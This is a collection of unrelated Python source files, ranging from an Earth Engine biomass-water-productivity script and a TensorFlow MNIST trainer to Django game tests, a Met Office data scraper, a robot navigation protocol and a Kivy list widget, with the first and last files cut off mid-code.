return matrixChainMemoised(p, i, j)
#main
n=int(stdin.readline().strip())
dp = [[-1 for j in range(n+1)]for i in range(n+1)]
p=[int(i) for i in stdin.readline().strip().split()]
n=len(p)
print(mcm(p,n))
|
# coding: utf-8
import ee
import datetime
import ee.mapclient
region = [[-25.0, -37.0], [60.0, -41.0],
[58.0, 39.0], [-31.0, 38.0], [-25.0, -37.0]]
VisPar_AGBPy = {"opacity": 0.85, "bands": "b1", "min": 0, "max":
12000, "palette": "f4ffd9,c8ef7e,87b332,566e1b",
"region": region}
VisPar_ETay = {"opacity": 0.85, "bands": "b1", "min": 0, "max":
2000, "palette": "d4ffc6,beffed,79c1ff,3e539f",
"region": region}
VisPar_WPbm = {"opacity": 0.85, "bands": "b1", "min": 0, "max": 1.2,
"palette": "bc170f,e97a1a,fff83a,9bff40,5cb326",
"region": region}
ee.Initialize()
collAGBP = ee.ImageCollection("projects/fao-wapor/L1_AGBP250")
collAET = ee.ImageCollection("users/lpeiserfao/AET250")
rasterSeason1 = ee.Image(collAGBP.first())
coordinate = rasterSeason1.get('system:footprint')
index = rasterSeason1.get('system:index')
def GEE_calc(agb_pass, aet_pass):
# Above Ground Biomass Production with masked NoData (pixel < 0)
L1_AGBPSeasonalMasked = agb_pass.map(
lambda lista: lista.updateMask(lista.gte(0)))
# .multiply(10); the multiplier will need to be
# applied on net FRAME delivery, not on sample dataset
L1_AGBPSummedYearly = L1_AGBPSeasonalMasked.sum()
# Actual Evapotranspiration with valid ETa values (>0 and <254)
ETaColl1 = aet_pass.map(
lambda immagine: immagine.updateMask(
immagine.lt(254).And(immagine.gt(0))))
# add image property (days in dekad) as band
ETaColl2 = ETaColl1.map(
lambda immagine: immagine.addBands(immagine.metadata('days_in_dk')))
# get ET value, divide by 10 (as per FRAME spec) to get daily value, and
# multiply by number of days in dekad summed annuallyS
ETaColl3 = ETaColl2.map(lambda immagine: immagine.select(
'b1').divide(10).multiply(immagine.select('days_in_dk'))).sum()
# scale ETsum from mm/m² to m³/ha for WP calculation purposes
ETaTotm3 = ETaColl3.multiply(10)
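# (1 mm of water depth over 1 ha = 10,000 m2 amounts to 10 m3, hence the factor of 10)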
# calculate biomass water productivity and add to map
WPbm = L1_AGBPSummedYearly.divide(ETaTotm3)
return WPbm
def selectRastersInput():
data_start = datetime.datetime(2015, 1, 1)
data_end = datetime.datetime(2015, 2, 1)
collAGBPFiltered = collAGBP.filterDate(
data_start,
data_end)
collAETFiltered = collAET.filterDate(
data_start,
data_end)
return collAGBPFiltered, collAETFiltered
def main(args=None):
# setup_logging()
# parser = argparse.ArgumentParser(description='WaPOR Dekad Analysis')
agb = selectRastersInput()[0]
aet = selectRastersInput()[1]
wp = GEE_calc(agb, aet)
ee.mapclient.addToMap(wp, VisPar_WPbm, 'Annual biomass water productivity')
ee.mapclient.centerMap(17.75, 10.14, 4)
if __name__ == '__main__':
main()
|
# -*- coding:utf-8 -*-
# !/usr/bin/env python3
"""
"""
def test_print_num():
from minghu6.algs.pprint import print_num
result = print_num(10000000000, split_len=3, split_char='_', need_print=False)
assert result == '10_000_000_000'
if __name__ == '__main__':
test_print_num()
|
# -*- coding: utf-8 -*-
"""Untitled13.ipynb
Automatically generated by Colaboratory.
Original file is located at
https://colab.research.google.com/drive/1bREcXDsoDGSvarUHDBVYKuh8AFtpRFD1
"""
import numpy as np
import matplotlib.pyplot as plt
ket_basis_0=np.array([[1],[0]])
print(ket_basis_0)
ket_basis_1=np.array([[0],[1]])
print(ket_basis_1)
def check_validity(qubit):
inner_product=np.dot(qubit,qubit.conjugate().transpose())
if inner_product==1:
print("Tne entered qubit is Valid")
else:
print("The entered qubit is Invalid")
def inner_product(qubit):
inner_product=np.dot(qubit,qubit.conjugate().transpose())
print(inner_product)
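# Example (illustrative values): the basis bra [1, 0] gives inner product 1 and is valid, while
# [1, 1] gives 2 and is invalid; it would need a 1/sqrt(2) normalization factor to be a valid state.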
# Take input qubit from the user
list_qubit_value=[]
def input_qubit():
repeat=False
while not repeat:
qubit_value=int(input("Enter qubit value: "))
list_qubit_value.append(qubit_value)
cntinue=input("Continue yes(y) or no(n): ")
if cntinue=='n':
repeat=True
return list_qubit_value
input_qubit()
bra_input_qubit=np.array([list_qubit_value])
ket_input_qubit=bra_input_qubit.conjugate().transpose()
print("Your qubit is: \n",ket_input_qubit)
print()
inner_product(bra_input_qubit)
check_validity(bra_input_qubit)
density_matrix=np.kron(ket_input_qubit,bra_input_qubit)
print("The density matrix of the qubit is: \n",density_matrix)
|
import boto3
def main():
ec2 = boto3.client('ec2', region_name='eu-west-1')
print(ec2.describe_instances())
print("coucou !")
if __name__ == "__main__":
main()
|
from __future__ import print_function
from tensorflow.examples.tutorials.mnist import input_data
import tensorflow as tf
import numpy as np
import os
######################################
######### Necessary Flags ############
######################################
tf.app.flags.DEFINE_string(
'train_root', os.path.dirname(os.path.abspath(__file__)) + '/train_logs',
'Directory where event logs are written to.')
tf.app.flags.DEFINE_string(
'checkpoint_root',
os.path.dirname(os.path.abspath(__file__)) + '/checkpoints',
'Directory where checkpoints are written to.')
tf.app.flags.DEFINE_integer('max_num_checkpoint', 10,
'Maximum number of checkpoints that TensorFlow will keep.')
tf.app.flags.DEFINE_integer('num_classes', 10,
'Number of model clones to deploy.')
tf.app.flags.DEFINE_integer('batch_size', np.power(2, 7),
'Number of model clones to deploy.')
tf.app.flags.DEFINE_integer('num_epochs', 5,
'Number of epochs for training.')
##########################################
######## Learning rate flags #############
##########################################
tf.app.flags.DEFINE_float('initial_learning_rate', 0.001, 'Initial learning rate.')
tf.app.flags.DEFINE_float(
'learning_rate_decay_factor', 0.95, 'Learning rate decay factor.')
tf.app.flags.DEFINE_float(
'num_epochs_per_decay', 1, 'Number of epoch pass to decay learning rate.')
#########################################
########## status flags #################
#########################################
tf.app.flags.DEFINE_boolean('is_training', False,
'Training/Testing.')
tf.app.flags.DEFINE_boolean('fine_tuning', False,
'Fine tuning is desired or not?.')
tf.app.flags.DEFINE_boolean('online_test', True,
'Fine tuning is desired or not?.')
tf.app.flags.DEFINE_boolean('allow_soft_placement', True,
'Automatically put the variables on CPU if there is no GPU support.')
tf.app.flags.DEFINE_boolean('log_device_placement', False,
'Demonstrate which variables are on what device.')
# Store all elements in the FLAGS structure!
FLAGS = tf.app.flags.FLAGS
################################################
################# handling errors!##############
################################################
if not os.path.isabs(FLAGS.train_root):
raise ValueError('You must assign absolute path for --train_root')
if not os.path.isabs(FLAGS.checkpoint_root):
raise ValueError('You must assign absolute path for --checkpoint_root')
##########################################
####### Load and Organize Data ###########
##########################################
'''
In this part the input data is prepared.
1 - The MNIST data will be downloaded.
2 - The images and labels for both training and testing will be extracted.
3 - The data is provided as flat feature vectors of shape (?, 784), which is exactly what the
fully connected (MLP) network defined below expects, so no reshaping to (?, 28, 28, 1) is needed.
'''
# Download and get the MNIST dataset (available in tensorflow.contrib.learn.python.learn.datasets.mnist).
# It checks for and downloads MNIST if it's not already downloaded, then extracts it.
# 'reshape' is left True so the images stay as flattened 784-dimensional feature vectors.
mnist = input_data.read_data_sets("MNIST_data/", reshape=True, one_hot=True)
train_data = mnist.train.images
train_label = mnist.train.labels
test_data = mnist.test.images
test_label = mnist.test.labels
# # The 'input.provide_data' is provided to organize any custom dataset which has specific characteristics.
# data = input.provide_data(mnist)
# Dimensionality of the training data
dimensionality_train = train_data.shape
# Dimensions
num_train_samples = dimensionality_train[0]
num_features = dimensionality_train[1]
#######################################
########## Defining Graph ############
#######################################
graph = tf.Graph()
with graph.as_default():
###################################
########### Parameters ############
###################################
# global step
global_step = tf.Variable(0, name="global_step", trainable=False)
# learning rate policy
decay_steps = int(num_train_samples / FLAGS.batch_size *
FLAGS.num_epochs_per_decay)
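# A rough sanity check (assuming the standard 55,000-image MNIST training split and the
# batch_size of 2**7 = 128 defined above): decay_steps = int(55000 / 128 * 1) = 429, i.e.
# the learning rate decays roughly once per epoch.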
learning_rate = tf.train.exponential_decay(FLAGS.initial_learning_rate,
global_step,
decay_steps,
FLAGS.learning_rate_decay_factor,
staircase=True,
name='exponential_decay_learning_rate')
###############################################
########### Defining place holders ############
###############################################
image_place = tf.placeholder(tf.float32, shape=([None, num_features]), name='image')
label_place = tf.placeholder(tf.float32, shape=([None, FLAGS.num_classes]), name='gt')
dropout_param = tf.placeholder(tf.float32)
##################################################
########### Model + Loss + Accuracy ##############
##################################################
# MODEL (MLP with two hidden layers)
# LAYER-1
net = tf.contrib.layers.fully_connected(inputs=image_place, num_outputs=250, scope='fc-1')
# LAYER-2
net = tf.contrib.layers.fully_connected(inputs=net, num_outputs=250, scope='fc-2')
# SOFTMAX
logits_pre_softmax = tf.contrib.layers.fully_connected(inputs=net, num_outputs=FLAGS.num_classes, scope='fc-3')
# Define loss
softmax_loss = tf.reduce_mean(
tf.nn.softmax_cross_entropy_with_logits(logits=logits_pre_softmax, labels=label_place))
# Accuracy
accuracy = tf.reduce_mean(
tf.cast(tf.equal(tf.argmax(logits_pre_softmax, 1), tf.argmax(label_place, 1)), tf.float32))
#############################################
########### training operation ##############
#############################################
# Define optimizer by its default values
optimizer = tf.train.AdamOptimizer(learning_rate=learning_rate)
# 'train_op' is an operation that is run for a gradient update on the parameters.
# Each execution of 'train_op' is a training step.
# By passing 'global_step' to the optimizer, each time 'train_op' is run, TensorFlow
# updates 'global_step' and increments it by one!
# gradient update.
with tf.name_scope('train_scope'):
grads = optimizer.compute_gradients(softmax_loss)
train_op = optimizer.apply_gradients(grads, global_step=global_step)
###############################################
############ Define Summaries #################
###############################################
# Summaries for loss and accuracy
tf.summary.scalar("loss", softmax_loss, collections=['train', 'test'])
tf.summary.scalar("accuracy", accuracy, collections=['train', 'test'])
tf.summary.scalar("global_step", global_step, collections=['train'])
tf.summary.scalar("learning_rate", learning_rate, collections=['train'])
# Merge all summaries together.
summary_train_op = tf.summary.merge_all('train')
summary_test_op = tf.summary.merge_all('test')
############################################
############ Run the Session ###############
############################################
session_conf = tf.ConfigProto(
allow_soft_placement=FLAGS.allow_soft_placement,
log_device_placement=FLAGS.log_device_placement)
sess = tf.Session(graph=graph, config=session_conf)
with sess.as_default():
# Run the saver.
# 'max_to_keep' determines the maximum number of checkpoints that TensorFlow saves and keeps (TensorFlow default: 5).
saver = tf.train.Saver(max_to_keep=FLAGS.max_num_checkpoint)
# Initialize all variables
sess.run(tf.global_variables_initializer())
###################################################
############ Training / Evaluation ###############
###################################################
# The prefix for checkpoint files
checkpoint_prefix = 'model'
###################################################################
########## Defining the summary writers for train/test ###########
###################################################################
train_summary_dir = os.path.join(FLAGS.train_root, "summaries", "train")
train_summary_writer = tf.summary.FileWriter(train_summary_dir)
train_summary_writer.add_graph(sess.graph)
test_summary_dir = os.path.join(FLAGS.train_root, "summaries", "test")
test_summary_writer = tf.summary.FileWriter(test_summary_dir)
test_summary_writer.add_graph(sess.graph)
# If the fine-tuning flag is True, the model will be restored.
if FLAGS.fine_tuning:
saver.restore(sess, os.path.join(FLAGS.checkpoint_root, checkpoint_prefix))
print("Model restored for fine-tuning...")
###################################################################
########## Run the training and loop over the batches #############
###################################################################
for epoch in range(FLAGS.num_epochs):
total_batch_training = int(train_data.shape[0] / FLAGS.batch_size)
# go through the batches
for batch_num in range(total_batch_training):
#################################################
########## Get the training batches #############
#################################################
start_idx = batch_num * FLAGS.batch_size
end_idx = (batch_num + 1) * FLAGS.batch_size
# Fit training using batch data
train_batch_data, train_batch_label = train_data[start_idx:end_idx], train_label[
start_idx:end_idx]
########################################
########## Run the session #############
########################################
# Run optimization op (backprop) and Calculate batch loss and accuracy
# When the 'global_step' tensor is evaluated, it will have been incremented by one.
batch_loss, _, train_summaries, training_step = sess.run(
[softmax_loss, train_op,
summary_train_op,
global_step],
feed_dict={image_place: train_batch_data,
label_place: train_batch_label,
dropout_param: 0.5})
########################################
########## Write summaries #############
########################################
# Write the summaries
train_summary_writer.add_summary(train_summaries, global_step=training_step)
# # Write the specific summaries for training phase.
# train_summary_writer.add_summary(train_image_summary, global_step=training_step)
#################################################
########## Plot the progressive bar #############
#################################################
print("Epoch #" + str(epoch + 1) + ", Train Loss=" + \
"{:.3f}".format(batch_loss))
#####################################################
########## Evaluation on the test data #############
#####################################################
if FLAGS.online_test:
# WARNING: In this evaluation the whole test set is fed at once. If the test data is huge, this
# may lead to a memory error. With large test sets, batched evaluation is
# recommended, as in the training phase.
test_accuracy_epoch, test_summaries = sess.run(
[accuracy, summary_test_op],
feed_dict={image_place: test_data,
label_place: test_label,
dropout_param: 1.})
print("Test Accuracy= " + \
"{:.4f}".format(test_accuracy_epoch))
###########################################################
########## Write the summaries for test phase #############
###########################################################
# Returning the value of global_step if necessary
current_step = tf.train.global_step(sess, global_step)
# Add the counter of the global step for proper scaling between train and test summaries.
test_summary_writer.add_summary(test_summaries, global_step=current_step)
###########################################################
############ Saving the model checkpoint ##################
###########################################################
# # The model will be saved when the training is done.
# Create the path for saving the checkpoints.
if not os.path.exists(FLAGS.checkpoint_root):
os.makedirs(FLAGS.checkpoint_root)
# save the model
save_path = saver.save(sess, os.path.join(FLAGS.checkpoint_root, checkpoint_prefix))
print("Model saved in file: %s" % save_path)
############################################################################
########## Run the session for pure evaluation on the test data #############
############################################################################
# The prefix for checkpoint files
checkpoint_prefix = 'model'
# Restoring the saved weights.
saver.restore(sess, os.path.join(FLAGS.checkpoint_root, checkpoint_prefix))
print("Model restored...")
# Evaluation of the model
total_test_accuracy = sess.run(accuracy, feed_dict={
image_place: test_data,
label_place: test_label,
dropout_param: 1.})
print("Final Test Accuracy is %.2f" % total_test_accuracy)
|
from datetime import timedelta
from django.test import TestCase
from django.utils import timezone
from app.models import Game, PlayerRole
from app.tests.helpers.tag_tester import TagTester
from app.tests.helpers.user_tester import UserTester
class TagTest(TestCase):
def setUp(self):
user_tester = UserTester()
self.game = Game.objects.get(name='Test Game')
self.tag_tester = TagTester()
self.human_user, self.human = user_tester.create_user_and_player('human@email.com', 'Human', 'Being')
_, zombie = user_tester.create_user_and_player('zombie@email.com', 'Zombie', 'Undead')
self.zombie = zombie.kill()
self.game.started_on = timezone.now()
self.game.save()
def test_no_tags(self):
self.assertEqual(self.zombie.value(timezone.now()), 5)
self.assertEqual(self.human.score(), 0)
def test_one_tag(self):
now = timezone.now()
self.tag_tester.tag(self.human, self.zombie, now - timedelta(seconds=1))
self.assertEqual(self.zombie.value(now - timedelta(hours=1)), 5)
self.assertEqual(self.zombie.value(now + timedelta(hours=1)), 4)
self.assertEqual(self.zombie.value(now), 4)
self.assertEqual(self.human.score(), 5)
def test_multiple_tags(self):
now = timezone.now()
for i in range(0, 3):
self.tag_tester.tag(self.human, self.zombie, now - timedelta(hours=3 - i))
self.assertEqual(self.zombie.value(now), 2)
self.assertEqual(self.human.score(), 5 + 4 + 3)
def test_six_tags(self):
now = timezone.now()
for i in range(0, 6):
self.tag_tester.tag(self.human, self.zombie, now - timedelta(hours=6 - i))
self.assertEqual(self.zombie.value(now), 0)
def test_expired_tag(self):
now = timezone.now()
too_long_ago = now - timedelta(hours=9)
self.tag_tester.tag(self.human, self.zombie, too_long_ago)
self.assertEqual(self.zombie.value(now), 5)
self.tag_tester.tag(self.human, self.zombie, now - timedelta(seconds=1))
self.assertEqual(self.zombie.value(now), 4)
def test_that_humans_turn_into_zombies(self):
self.tag_tester.tag(self.zombie, self.human, timezone.now())
self.assertEqual(self.human_user.participant(self.game).role, PlayerRole.ZOMBIE)
|
# -*- coding: utf-8 -*-
u"""SDDS utilities.
:copyright: Copyright (c) 2018 RadiaSoft LLC. All Rights Reserved.
:license: http://www.apache.org/licenses/LICENSE-2.0.html
"""
from __future__ import absolute_import, division, print_function
from pykern import pkio
from pykern import pksubprocess
from pykern.pkdebug import pkdc, pkdexc, pkdlog, pkdp
from sirepo.template import elegant_common
import math
import re
import sdds
# elegant mux and muy are computed in sddsprocess below
_ELEGANT_TO_MADX_COLUMNS = [
['ElementName', 'NAME'],
['ElementType', 'TYPE'],
['s', 'S'],
['betax', 'BETX'],
['alphax', 'ALFX'],
['mux', 'MUX'],
['etax', 'DX'],
['etaxp', 'DPX'],
['betay', 'BETY'],
['alphay', 'ALFY'],
['muy', 'MUY'],
['etay', 'DY'],
['etayp', 'DPY'],
['ElementOccurence', 'COUNT'],
]
MADX_TWISS_COLUMS = map(lambda row: row[1], _ELEGANT_TO_MADX_COLUMNS)
_SDDS_INDEX = 0
def extract_sdds_column(filename, field, page_index):
return process_sdds_page(filename, page_index, _sdds_column, field)
def process_sdds_page(filename, page_index, callback, *args, **kwargs):
try:
if sdds.sddsdata.InitializeInput(_SDDS_INDEX, filename) != 1:
pkdlog('{}: cannot access'.format(filename))
# In normal execution, the file may not yet be available over NFS
err = _sdds_error('Output file is not yet available.')
else:
#TODO(robnagler) SDDS_GotoPage not in sddsdata, why?
for _ in xrange(page_index + 1):
if sdds.sddsdata.ReadPage(_SDDS_INDEX) <= 0:
#TODO(robnagler) is this an error?
break
try:
return callback(*args, **kwargs)
except SystemError as e:
pkdlog('{}: page not found in {}'.format(page_index, filename))
err = _sdds_error('Output page {} not found'.format(page_index) if page_index else 'No output was generated for this report.')
finally:
try:
sdds.sddsdata.Terminate(_SDDS_INDEX)
except Exception:
pass
return {
'err': err,
}
def twiss_to_madx(elegant_twiss_file, madx_twiss_file):
outfile = 'sdds_output.txt'
twiss_file = 'twiss-with-mu.sdds'
# convert elegant psix to mad-x MU, rad --> rad / 2pi
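# (note: to my understanding the '-define' expressions below are RPN, so "psix 2 pi * /"
# evaluates to psix / (2*pi), matching the MAD-X convention of phase advance in units of 2*pi)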
pksubprocess.check_call_with_signals([
'sddsprocess',
elegant_twiss_file,
'-define=column,mux,psix 2 pi * /',
'-define=column,muy,psiy 2 pi * /',
twiss_file,
], output=outfile, env=elegant_common.subprocess_env())
pksubprocess.check_call_with_signals([
'sdds2stream',
twiss_file,
'-columns={}'.format(','.join(map(lambda x: x[0], _ELEGANT_TO_MADX_COLUMNS))),
], output=outfile, env=elegant_common.subprocess_env())
lines = pkio.read_text(outfile).split('\n')
header = '* {}\n$ \n'.format(' '.join(map(lambda x: x[1], _ELEGANT_TO_MADX_COLUMNS)))
pkio.write_text(madx_twiss_file, header + '\n'.join(lines) + '\n')
def _safe_sdds_value(v):
if isinstance(v, float) and (math.isinf(v) or math.isnan(v)):
return 0
return v
def _sdds_column(field):
column_names = sdds.sddsdata.GetColumnNames(_SDDS_INDEX)
column_def = sdds.sddsdata.GetColumnDefinition(_SDDS_INDEX, field)
values = sdds.sddsdata.GetColumn(
_SDDS_INDEX,
column_names.index(field),
)
return {
'values': map(lambda v: _safe_sdds_value(v), values),
'column_names': column_names,
'column_def': column_def,
'err': None,
}
def _sdds_error(error_text='invalid data file'):
sdds.sddsdata.Terminate(_SDDS_INDEX)
return {
'error': error_text,
}
|
import os
import sys
sys.path.append(os.path.join(os.path.dirname(__file__), ".."))
from lib.batch_annotator import BatchAnnotator
def main(csv_filename):
batch_annotator = BatchAnnotator(linker="umls")
output_filename = csv_filename.replace(".csv", ".json")
batch_annotator.load_csv(csv_filename)
batch_annotator.annotate(output_file=output_filename)
print("Done annotating %s, output in %s" % (csv_filename, output_filename))
if __name__ == "__main__":
if len(sys.argv) < 2 or not sys.argv[1].endswith(".csv"):
print("Specify a CSV file (.csv) to process")
else:
main(sys.argv[1])
|
# -*- coding: utf-8 -*-
from google.appengine.api import urlfetch
from google.appengine.api import urlfetch_errors
from bs4 import BeautifulSoup
import models
URL = "http://www.metoffice.gov.uk/climate/uk/summaries/datasets#Yearorder"
recording_fields = ['Year', 'JAN', 'FEB', 'MAR', 'APR', 'MAY', 'JUN', 'JUL', 'AUG', 'SEP', 'OCT', 'NOV', 'DEC', 'WIN',
'SPR', 'SUM', 'AUT', 'ANN']
urlfetch.set_default_fetch_deadline(60)
def make_soup(url):
"""
returns a BeautifulSoup instance.
:param url: String, URL which you want to get.
:return: instance, of BeautifulSoup
"""
try:
content_html = urlfetch.fetch(url).content
except urlfetch_errors.InvalidURLError:
return
return BeautifulSoup(content_html, "lxml")
def get_and_save_readings(url, region, mode):
"""
Gets data from the txt table.
:param mode: Object, To which mode does the readings belong.
:param region: Object, To which the region does the readings belongs.
:param url: url link for the txt file.
:return: a bool
"""
data = []
try:
content_txt = urlfetch.fetch(url).content
except (urlfetch_errors.InvalidURLError, urlfetch_errors.DownloadError):
return
# Splitting the text file into table and text
table = content_txt.split('ANN\n')[1]
lines = table.split('\n')
# Parsing of past years
for line in lines[:-2]:
read = []
reading_list = line.split()
for index, reading in enumerate(reading_list):
if index == 0:
value = int(reading)
elif reading == '---':
value = None
else:
value = float(reading)
read.append(value)
if len(read) == 18:
data.append(read)
else:
print "Some values are missing(in past year parsing).."
# Parsing current year
read = []
year = lines[-2][:4]
read.append(int(year))
months_data = lines[-2][4:84]
month_data_separated = [months_data[i:i + 7] for i in range(0, len(months_data), 7)]
for m_data in month_data_separated:
value = m_data.strip()
if value == '':
value = None
else:
value = float(value)
read.append(value)
seasons_data = lines[-2][91:]
seasons_data_separated = map(float, seasons_data.split())
if len(seasons_data_separated) != 5:
i = 5 - len(seasons_data_separated)
while i != 0:
seasons_data_separated.append(None)
i -= 1
read.extend(seasons_data_separated)
if len(read) == 18:
data.append(read)
else:
print "Some values are missing(in current year parsing).."
# Updating or creating the datastore entry for each year
for item in data:
dictionary = dict(zip(recording_fields, item))
obj, created = models.Readings.objects.update_or_create(Region=region, Mode=mode, Year=dictionary['Year'],
defaults=dictionary)
def get_updates():
"""
Update or create everything from live website parsing
:return: bool, updated or not
"""
soup = make_soup(URL)
try:
table = soup.findAll('table', class_='table')
# Parsing types of Modes of data
mode_dict = {}
th = table[1].find('tr')
for index, td in enumerate(th.findAll('th')[1:]):
m = td.get_text().strip()
# fix for 'Raindays' column
if u'≥' in m:
m = m.rsplit(' ', 1)[0].strip()
mode_dict[index] = m
# Parsing and saving table data
tr_all = table[1].findAll('tr')[1:]
if tr_all:
for tr in tr_all:
td_name = tr.find('td').get_text()
# print td_name
region, created = models.Region.objects.get_or_create(Name=td_name)
for index, td in enumerate(tr.findAll('td')[1:]):
link = td.find('a').get('href')
# Saving Modes and links into database tables
mode, created = models.Mode.objects.get_or_create(Name=mode_dict[index])
link_obj, link_created = models.Link.objects.update_or_create(Link=link, Region=region,
Mode=mode)
try:
get_and_save_readings(link, region, mode)
except urlfetch_errors.DeadlineExceededError:
# print link
pass
# print tr_all
return True
else:
# no result in table
print 'No result for this query. Please Try again..'
return False
except AttributeError:
# no table in the html page
print 'Invalid query. Please Try again..'
return False
|
import json
with open('sample.json', 'r') as file:
result = json.load(file)
print(result)
|
SERVER_MOVE = "102 MOVE"
SERVER_TURN_LEFT = "103 TURN LEFT"
SERVER_TURN_RIGHT = "104 TURN RIGHT"
SERVER_PICK_UP = "105 GET MESSAGE"
SERVER_LOGOUT = "106 LOGOUT"
SERVER_OK = "200 OK"
SERVER_LOGIN_FAILED = "300 LOGIN FAILED"
SERVER_SYNTAX_ERROR = "301 SYNTAX ERROR"
SERVER_LOGIC_ERROR = "302 LOGIC ERROR"
SERVER_KEY = 54621
CLIENT_KEY = 45328
TIMEOUT = 1
TIMEOUT_RECHARGING = 5
UP = 0
RIGHT = 1
DOWN = 2
LEFT = 3
class InvalidMessage(Exception):
pass
def create_message(message):
if type(message) != str:
return (str(message) + "\a\b").encode("utf-8")
return (message + "\a\b").encode("utf-8")
def syntax_check(message, phase, last_action, sep):
print("Syntax check: ", message, sep="")
a_at_end = False
now_separated = False
if sep == "\a\b":
now_separated = True
if len(message) > 0 and message[len(message) - 1] == "\a":
a_at_end = True
offset = 1
else:
offset = 2
if phase == 0 and len(message) > 12 - offset:
raise InvalidMessage("Username too long")
elif phase == 1 and len(message) > 7 - offset and message != "RECHARGING"[:len(message)] and message != "FULL POWER"[:len(message)]:
raise InvalidMessage("Client confirmation too long")
elif phase == 1 and message != "RECHARGING"[:len(message)] and message != "FULL POWER"[:len(message)]:
if (a_at_end and not message[:-1].isnumeric()) or (not a_at_end and not message.isnumeric()):
raise InvalidMessage("Client confirmation not numeric")
elif (phase == 2 or phase == 3 or phase == 4) and len(message) > 12 - offset and last_action != SERVER_PICK_UP:
raise InvalidMessage("Client action too long")
elif (phase == 2 or phase == 3 or phase == 4) and last_action != SERVER_PICK_UP and message != "RECHARGING\a"[:len(message)] and message != "FULL POWER\a"[:len(message)]:
split = message.split(" ")
if len(split) > 3:
raise InvalidMessage("Invalid format of client ok response")
if len(split) == 1:
if split[0] != "OK" and split[0] != "O":
raise InvalidMessage("Wrong format of the client action")
if len(split) == 2:
if split[0] != "OK" or split[1][-1:] == "\a":
raise InvalidMessage("Wrong format of the client action")
if split[1] != "-" and split[1] != "":
x = None
try:
x = float(split[1])
except ValueError as e:
raise InvalidMessage("Wrong format of the client action")
if not x.is_integer():
raise InvalidMessage("Wrong format of the client action")
if len(split) == 3:
if split[0] != "OK" or split[1] == "-" or (split[2] == "-" and now_separated) or (len(split) > 1 and split[2][-2:] == "-\a" and now_separated):
raise InvalidMessage("Wrong format of the client action")
if split[2] != "" and split[2] != "-":
y = None
try:
if a_at_end:
y = float(split[2][:-1])
else:
y = float(split[2])
except ValueError as e:
raise InvalidMessage("Wrong format of the client action")
if not y.is_integer():
raise InvalidMessage("Wrong format of the client action")
elif last_action == SERVER_PICK_UP and len(message) > 100 - offset and message != "RECHARGING"[:len(message)] and message != "FULL POWER"[:len(message)]:
raise InvalidMessage("Message too long")
return message
def compute_hash(username):
char_sum = 0
for c in username:
char_sum += ord(c)
return (char_sum * 1000) % 65536
def get_direction(coords1, coords2):
x1, y1 = coords1
x2, y2 = coords2
if x1 == x2 and y1 != y2:
if y1 < y2:
return UP
else:
return DOWN
elif x1 != x2 and y1 == y2:
if x1 < x2:
return RIGHT
else:
return LEFT
else:
return 4
def get_next_move(position, direction):
x, y = position
if x > -2:
if direction == UP:
return SERVER_TURN_LEFT, position, LEFT
elif direction == DOWN:
return SERVER_TURN_RIGHT, position, LEFT
elif direction == RIGHT:
return SERVER_TURN_LEFT, position, UP
return SERVER_MOVE, (x-1, y), LEFT
elif x < -2:
if direction == UP:
return SERVER_TURN_RIGHT, position, RIGHT
elif direction == DOWN:
return SERVER_TURN_LEFT, position, RIGHT
elif direction == LEFT:
return SERVER_TURN_RIGHT, position, UP
return SERVER_MOVE, (x+1, y), RIGHT
elif y > 2:
if direction == LEFT:
return SERVER_TURN_LEFT, position, DOWN
elif direction == RIGHT:
return SERVER_TURN_RIGHT, position, DOWN
elif direction == UP:
return SERVER_TURN_RIGHT, position, RIGHT
return SERVER_MOVE, (x, y-1), DOWN
elif y < 2:
if direction == LEFT:
return SERVER_TURN_RIGHT, position, UP
elif direction == RIGHT:
return SERVER_TURN_LEFT, position, UP
elif direction == DOWN:
return SERVER_TURN_LEFT, position, RIGHT
return SERVER_MOVE, (x, y+1), UP
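# Illustrative trace (made-up start position, not from the assignment): starting at (0, 0) facing UP,
# successive calls return TURN LEFT, MOVE, MOVE (now at (-2, 0)), TURN RIGHT, MOVE, MOVE,
# arriving at (-2, 2) where search_box takes over.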
def search_box(position, direction, picked):
if position == (-2, 2):
if direction == UP:
return SERVER_TURN_RIGHT, position, RIGHT, False
elif direction == RIGHT:
return SERVER_TURN_RIGHT, position, DOWN, False
elif direction == LEFT:
return SERVER_TURN_LEFT, position, DOWN, False
if not picked:
picked = True
return SERVER_PICK_UP, position, direction, picked
elif position == (2, -2):
return "Not found!"
else:
x, y = position
picked = False
if x % 2 == 0:
if y != -2:
if direction == RIGHT:
return SERVER_TURN_RIGHT, position, DOWN, picked
return SERVER_MOVE, (x, y-1), DOWN, picked
if y == -2:
if direction == DOWN:
return SERVER_TURN_LEFT, position, RIGHT, True
else:
return SERVER_MOVE, (x+1, y), RIGHT, picked
else:
if y != 2:
if direction == RIGHT:
return SERVER_TURN_LEFT, position, UP, picked
return SERVER_MOVE, (x, y+1), UP, picked
if y == 2:
if direction == UP:
return SERVER_TURN_RIGHT, position, RIGHT, True
else:
return SERVER_MOVE, (x+1, y), RIGHT, picked
# print("RECHARGING"[:20])
|
from kivy.clock import Clock
from kivy.properties import BooleanProperty, ObjectProperty
from kivy.uix.boxlayout import BoxLayout
from kivy.uix.label import Label
class IndexedItem:
def __init__(self, index=None, item=None):
self.index = index
self.item = item
class ListView(BoxLayout):
selected_element = ObjectProperty(IndexedItem())
def __init__(self, items, render_item=None, item_height=25, **kwargs):
super().__init__(**kwargs)
self.orientation = 'vertical'
self._list_items = []
self._render_item = render_item
self._item_height = item_height
for item in items:
self.add_list_item(item)
def on_minimum_height(self, _, minimum_height):
self.height = minimum_height
def _create_list_item(self, index, item):
list_item = ListViewItem(index, item, self._render_item, self, height=self._item_height, size_hint_y=None)
list_item.bind(selected=self._on_list_item_selected)
return list_item
def _on_list_item_selected(self, instance, selected):
prev_index = self.selected_element.index
if selected:
self.selected_element = IndexedItem(instance.index, instance.item)
Clock.schedule_once(lambda _: self._rebuild_list_items(instance.index, prev_index), 0)
def _rebuild_list_items(self, index, prev_index):
if prev_index is not None:
self._list_items[prev_index].rebuild()
if index is not None:
self._list_items[index].rebuild()
def add_list_item(self, item):
list_item = self._create_list_item(len(self._list_items), item)
self._list_items.append(list_item)
self.add_widget(list_item)
def clear_list_items(self):
self._list_items = []
self.clear_widgets()
self.selected_element = IndexedItem()
def select_item(self, index):
if self.selected_element.index is not None:
previously_selected = self._list_items[self.selected_element.index]
previously_selected.selected = False
if len(self._list_items) > 0:
self._list_items[index].selected = True
class ListViewItem(BoxLayout):
selected = BooleanProperty(False)
def __init__(self, index, item, render_function, parent, **kwargs):
super().__init__(**kwargs)
self.item = item
self.index = index
self._render = render_function
self.add_widget(self._build_item(parent))
